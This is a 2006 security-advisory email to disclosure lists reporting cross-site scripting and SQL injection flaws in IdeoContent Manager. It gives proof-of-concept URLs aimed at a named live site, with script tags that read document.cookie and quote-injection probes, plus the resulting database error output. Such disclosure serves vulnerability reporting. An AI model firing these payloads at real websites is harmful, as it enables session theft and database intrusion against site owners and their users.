From: preddy . <lil.turk@email.com>
To: cert@cert.org, Vuln@frsirt.com, moderators@osvdb.org, vuln@secunia.com, bugtraq@securityfocus.com
Date: Wed, 18 Jan 2006 18:25:37 -0500
Subject: [OSVDB Mods] [iso-8859-1] IdeoContent Manager© - Cross Site Scripting & SQL Injection
Parts/Attachments:

IdeoContent Manager© - Cross Site Scripting & SQL Injection

Vendor URL: http://www.ideosoft.ro/cms/manager/

PoC:

XSS:

http://www.roel.ro/news_full.php?&page=2"><script>alert(document.cookie)</script>
http://www.roel.ro/index.php?goto_id="><script>alert(document.cookie)</script>


SQL Injection:

http://www.roel.ro/index.php?goto_id=18'
http://www.roel.ro/index.php?mid='

Result:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL
result resource in /home/httpd/html/includes/application_top.php on line
61
1064 - You have an error in your SQL syntax near '\'' at line 1

select * from protected_pages where menu_id =18\'

[TEP STOP]

Preddy
RootShell Security Group